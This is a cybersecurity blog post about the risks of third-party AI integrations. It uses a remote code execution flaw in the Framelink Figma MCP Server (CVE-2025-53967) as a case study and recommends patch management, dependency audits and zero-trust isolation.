Are Your AI Tools Safe? Lessons from the Figma MCP Server Breach

It seems everyone is in a mad dash to plug some form of AI into every nook and cranny of their business. It’s the new digital gold rush. But in the frenzy to appear innovative, has anyone actually stopped to check if they’ve left the digital back door swinging wide open? We’re so mesmerised by what these new agentic AI systems can do—write code, design interfaces, manage workflows—that we’re conveniently ignoring the glaring security holes they bring with them. The rapid integration of these tools is creating a minefield of AI third-party risks, and it’s a problem we’re only just beginning to comprehend.
The latest canary in this particular coal mine is a nasty vulnerability found in a connector for Figma, the wildly popular design tool. It’s a perfect, if unsettling, illustration of how our excitement for AI functionality is dangerously outpacing our need for fundamental security. This isn’t just a technical blip; it’s a warning shot for every organisation racing to adopt AI without a second thought for the consequences.

The New Supply Chain: Understanding AI Third-Party Risks

So, what exactly are AI third-party risks? Think of it this way. When you integrate a third-party AI tool into your workflow, you’re not just getting a shiny new capability. You’re effectively hiring a team of contractors and giving them access to your digital premises. You inherit their tools, their work habits, and, crucially, any security flaws they might have. You wouldn’t let a construction crew start work on your headquarters without vetting them and checking their insurance, would you? And yet, countless businesses are giving AI agents the virtual keys to the kingdom with little more than a cursory glance at the marketing brochure.
This isn’t just about data privacy, though that’s certainly part of it. The real danger lies in the deep integration these systems require. Agentic AI, the kind that can take actions on its own, needs to connect to other applications and data sources to be useful. These connections, often managed by small, overlooked pieces of software called “connectors” or “servers”, become the weakest links in your security chain. A flaw in one of these components doesn’t just compromise the AI tool; it can compromise your entire network.

The Unholy Trinity of AI Security Headaches

When we peel back the layers of these AI integrations, three major areas of concern consistently float to the surface. These aren’t new problems, but the speed and scale of AI adoption have amplified them to a terrifying degree.

See also  AI-Powered Defense: Anticipating Ransomware Threats in a Volatile Europe

That Boring-but-Crucial Task: Patch Management

Let’s be honest, patch management is the digital equivalent of flossing. Nobody enjoys it, it’s easy to forget, but skipping it will eventually lead to catastrophic failure. In the context of AI, patches are the software updates that fix security holes and bugs in the tools and connectors you use. When a vulnerability is discovered, developers release a patch to fix it. It’s then up to you—the user—to apply that update.
The problem? In the rush to deploy, many organisations set up these AI integrations and then forget about them. That nifty AI code generator you installed six months ago? It’s likely running on outdated software with known vulnerabilities. As researchers from security firms like Wiz and Adversa have pointed out, the fast-paced development cycle of AI tools means patches are being released constantly. Failing to keep up isn’t just lazy; it’s an open invitation for attackers.

The Keys to the Kingdom: RCE Vulnerabilities

This brings us to the real nightmare scenario: RCE vulnerabilities. RCE, or Remote Code Execution, is as bad as it sounds. It means an attacker, sitting potentially on the other side of the world, can run their own malicious code on your system. Imagine giving a stranger a key to your office, but that key not only opens the front door but also gives them access to the building’s master control panel, letting them shut down the power, access the server room, and spy on every conversation. That’s what an RCE flaw does.
A recent example of this, as detailed by Dark Reading, is the CVE-2025-53967 vulnerability found in Framelink’s Figma MCP Server. This software component, designed to bridge the gap between Figma and AI code generators, contained a critical flaw. Because of improper input validation—a classic and frankly amateurish coding error—an attacker could send a specially crafted message and execute arbitrary commands on the server. With a severity score of 7.5 out of 10, this is no trivial matter. It’s a direct pathway into an organisation’s network, all because of a single, poorly secured third-party component.

See also  Joe Whitley Appointed to ABA Cybersecurity Legal Task Force to Strengthen Cyber Laws

The Figma incident shines a glaring spotlight on the broader issue of supply chain security. Modern software isn’t built from scratch. It’s assembled, like a complex Lego model, from hundreds or even thousands of pre-built components, many of them open-source. The figma-developer-mcp npm package at the heart of the Framelink vulnerability is a perfect example. It’s just one small piece of a much larger puzzle.
Your supply chain security is about ensuring every single one of those pieces is secure. If a vulnerability exists in a tiny, obscure open-source library that your flashy AI tool depends on, your entire system is compromised. Attackers are increasingly targeting these downstream dependencies because they know it’s the path of least resistance. Why bother trying to breach a heavily fortified corporate network when you can just sneak a malicious bit of code into a popular developer package and wait for it to be installed all over the world?

Case Study: The Figma MCP Server Fiasco

Let’s dig into the specifics of this Framelink Figma MCP Server vulnerability, because it’s a textbook case of what can go wrong.
The Model Context Protocol (MCP), developed by companies including Anthropic, is designed to be a standard way for AI agents to interact with external tools. The server component acts as a middleman, translating the AI’s requests into actions within an application like Figma. According to the investigation cited by Dark Reading, the vulnerability (CVE-2025-53967) was found in an npm package used by the server, allowing an unauthenticated attacker to achieve remote code execution.
Here’s where it gets truly concerning. Security researchers from Backslash Security and Knostic discovered that not only did this flaw exist, but the exposure was massive.
– They identified over 15,000 MCP servers deployed globally.
– Worse still, a scan revealed roughly 2,000 of these servers were exposed directly to the internet without any authentication.
Let that sink in. Thousands of organisations had installed a direct, unprotected bridge into their internal systems, all in the name of AI-powered convenience. The fix is technically simple: upgrade to version 0.6.3 or higher of the Figma MCP package. But how many of those 15,000 deployments have been patched? How many are still sitting out there, vulnerable and forgotten? This isn’t just a failure of one software package; it’s a systemic failure of security awareness.

See also  Top Cybersecurity Stocks 2024: Palo Alto Networks vs Okta – Best Investment Choice

It’s Time to Stop Admiring the Problem

So, what should you be doing about it? Sitting on your hands and hoping for the best is not a strategy. Mitigating AI third-party risks requires a proactive and, dare I say, slightly paranoid mindset.
Treat Patch Management Like a Fire Drill: Stop thinking of software updates as an annoying pop-up. Patch management needs to be a core, non-negotiable part of your security operations. Automate where you can, but have a clear, rapid-response process for critical vulnerabilities like the Figma MCP one. You should know within hours—not weeks—what your exposure is and have a plan to fix it.
Become the Nosy Neighbour of Your Tech Stack: You need to start auditing your third-party integrations with the same rigour you apply to your own code. Before you integrate any AI tool, ask the hard questions. What data does it access? What open-source components does it use? What is its security track record? Demand a Software Bill of Materials (SBOM) so you know exactly what “ingredients” you’re bringing into your environment.
Assume Breach and Build a Moat: The principle of “zero trust” has never been more relevant. Don’t automatically grant an AI agent—or any third-party tool—broad access to your network. Sandbox them. Isolate them. Give them the absolute minimum level of privilege they need to do their job and nothing more. If the Figma MCP server had been properly isolated, the impact of an RCE exploit could have been contained, rather than potentially exposing the entire network.
The AI revolution is undoubtedly here, promising unprecedented leaps in productivity and creativity. But we are currently building this revolutionary future on a foundation of sand. The Framelink Figma vulnerability isn’t a freak accident; it’s the logical outcome of a culture that prizes speed and features above stability and security. It’s a loud, clanging alarm bell, and we need to start listening. Ignoring the deep-seated AI third-party risks is no longer an option. It’s a gamble you can’t afford to lose.
So, I have to ask: what’s the one AI tool your organisation has adopted that keeps you up at night? Are you confident it’s secure? Share your thoughts in the comments below.

World-class, trusted AI and Cybersecurity News delivered first hand to your inbox. Subscribe to our Free Newsletter now!

- Advertisement -spot_img

Latest news

The AI Threat Detection Revolution: Operationalizing Success in SOC Environments

It seems every security vendor on the planet is shouting from the rooftops about their "revolutionary" AI. And for...

Is Your Security Team Ready for AI? A CISO’s Essential Guide

For the past year, the technology world has been completely consumed by the AI conversation. From boardroom strategy...

Protecting Your AI: Key Strategies for a Safer Deployment

The tech world is utterly besotted with artificial intelligence. We're told it will cure diseases, solve climate change, and...

Revolutionizing Cybersecurity: The Crucial Link Between AI and Business Strategy

For the past couple of years, the noise around Artificial Intelligence in cybersecurity has been deafening. Every vendor, every...

Must read

Why Your Business Needs to Address the AI Ransomware Threat NOW

Let's cut to the chase. Europe's critical infrastructure—the very...

From Burnout to Breakthrough: AI’s Role in Enhancing Clinical Workflow

Let's get one thing straight: nobody endures years of...
- Advertisement -spot_img

You might also likeRELATED

More from this authorEXPLORE

Protecting Your AI: Key Strategies for a Safer Deployment

The tech world is utterly besotted with artificial intelligence. We're told...

Inside the Covert Operations: The SesameOp Backdoor and AI-Powered Cyberattacks

It was always going to happen, wasn't it? The moment a...

Navigating AI Stock Volatility: Correction vs. Bubble Burst – Expert Insights

The moment a golden goose like AI starts laying slightly less...

Unlocking the Future: Cisco’s AI-Driven Support System Redefines Enterprise Success

Let's be honest, has anyone ever truly loved calling IT support?...